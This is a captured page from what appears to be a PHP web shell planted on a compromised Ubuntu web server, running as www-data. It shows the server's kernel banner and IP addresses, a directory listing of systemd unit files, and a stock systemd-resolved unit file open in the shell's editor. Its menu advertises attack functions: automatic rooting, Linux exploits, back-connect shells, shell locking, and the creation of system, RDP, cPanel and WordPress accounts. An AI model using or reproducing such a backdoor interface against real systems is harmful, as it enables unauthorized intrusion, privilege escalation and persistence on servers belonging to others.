Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.159.119.55
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2.service
395
B
-rw-r--r--
atd.service
347
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
cron.service
316
B
-rw-r--r--
dmesg.service
358
B
-rw-r--r--
elasticsearch.service
1.79
KB
-rw-r--r--
grub-common.service
583
B
-rw-r--r--
grub-initrd-fallback.service
408
B
-rw-r--r--
lxd-agent-9p.service
489
B
-rw-r--r--
lxd-agent.service
498
B
-rw-r--r--
mariadb.service
5.7
KB
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
nginx.service
1013
B
-rw-r--r--
php7.4-fpm.service
523
B
-rw-r--r--
php8.1-fpm.service
523
B
-rw-r--r--
pollinate.service
404
B
-rw-r--r--
remote-fs.target
522
B
-rw-r--r--
rsync.service
255
B
-rw-r--r--
rsyslog.service
435
B
-rw-r--r--
secureboot-db.service
604
B
-rw-r--r--
snap-core-17212.mount
323
B
-rw-r--r--
snap-core-17247.mount
323
B
-rw-r--r--
snapd.apparmor.service
1.21
KB
-rw-r--r--
snapd.autoimport.service
432
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
308
B
-rw-r--r--
snapd.service
607
B
-rw-r--r--
ssh.service
538
B
-rw-r--r--
sysstat.service
523
B
-rw-r--r--
systemd-resolved.service
1.69
KB
-rw-r--r--
thermald.service
290
B
-rw-r--r--
ua-reboot-cmds.service
323
B
-rw-r--r--
ufw.service
266
B
-rw-r--r--
unattended-upgrades.service
377
B
-rw-r--r--
vsftpd.service
248
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-resolved.service
# SPDX-License-Identifier: LGPL-2.1+ # # This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Network Name Resolution Documentation=man:systemd-resolved.service(8) Documentation=https://www.freedesktop.org/wiki/Software/systemd/resolved Documentation=https://www.freedesktop.org/wiki/Software/systemd/writing-network-configuration-managers Documentation=https://www.freedesktop.org/wiki/Software/systemd/writing-resolver-clients DefaultDependencies=no After=systemd-sysusers.service systemd-networkd.service Before=network.target nss-lookup.target shutdown.target Conflicts=shutdown.target Wants=nss-lookup.target [Service] AmbientCapabilities=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE CapabilityBoundingSet=CAP_SETPCAP CAP_NET_RAW CAP_NET_BIND_SERVICE ExecStart=!!/lib/systemd/systemd-resolved LockPersonality=yes MemoryDenyWriteExecute=yes NoNewPrivileges=yes PrivateDevices=yes PrivateTmp=yes ProtectControlGroups=yes ProtectHome=yes ProtectKernelModules=yes ProtectKernelTunables=yes ProtectKernelLogs=yes ProtectSystem=strict Restart=always RestartSec=0 RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6 RestrictNamespaces=yes RestrictRealtime=yes RestrictSUIDSGID=yes RuntimeDirectory=systemd/resolve RuntimeDirectoryPreserve=yes SystemCallArchitectures=native SystemCallErrorNumber=EPERM SystemCallFilter=@system-service Type=notify User=systemd-resolve WatchdogSec=3min [Install] WantedBy=multi-user.target Alias=dbus-org.freedesktop.resolve1.service
Close